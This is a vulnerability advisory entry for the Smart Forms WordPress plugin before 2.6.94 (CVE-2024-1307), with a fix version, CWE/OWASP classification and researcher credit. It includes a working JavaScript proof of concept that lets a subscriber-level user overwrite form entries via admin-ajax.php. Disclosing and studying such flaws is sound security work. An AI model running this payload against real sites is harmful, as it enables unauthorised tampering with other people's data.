WordPress Plugin Vulnerabilities

Smart Forms < 2.6.94 - Subscriber+ Edit Entries via Broken Access Control

Description

The plugin does not have proper authorization in some actions, which could allow users with a role as low as a subscriber to call them and perform unauthorized actions

Proof of Concept

While logged as a subscriber, paste the following in your browser's console:

fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams({
        'action': 'rednao_smart_forms_edit_form_values',
        'entryId': '7',
        'entryString': '{"rnField1":{"value":"Mr Hacker"},"rnField2":{"value":"mehdi@mtest.com"},"rnField3":{"value":"SUCCESSFUL FIELD HACK"}}',
        'elementOptions': JSON.stringify([{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}])
    })
})
.then(response => response.json())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));

Affects Plugins

Plugin icon
smart-forms
Fixed in 2.6.94

References

CVE
CVE-2024-1307

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher
Amir Hossein Fallahi
Submitter
Amir Hossein Fallahi
Submitter website
https://securityflaws.net/
Submitter twitter
amir_h_fallahi/
Verified
Yes
WPVDB ID
bbc6cebd-e9bf-4b08-a474-f9312b3c0947

Timeline

Publicly Published
2024-03-25 (about 1 months ago)
Added
2024-03-25 (about 1 months ago)
Last Updated
2024-03-25 (about 1 months ago)

Other

Published
Title
Published
2023-07-18
Title
Easy Captcha <= 1.0 - Missing Authorization
Published
2024-03-11
Title
Mollie Forms < 2.6.4 - Missing Authorization
Published
2023-12-26
Title
Easy Digital Downloads < 3.2.0 - Missing Authorization
Published
2022-07-11
Title
YaySMTP < 2.2.1 - Subscriber+ SMTP Credentials Leak
Published
2023-11-03
Title
Simple Job Board < 2.10.6 - Missing Authorization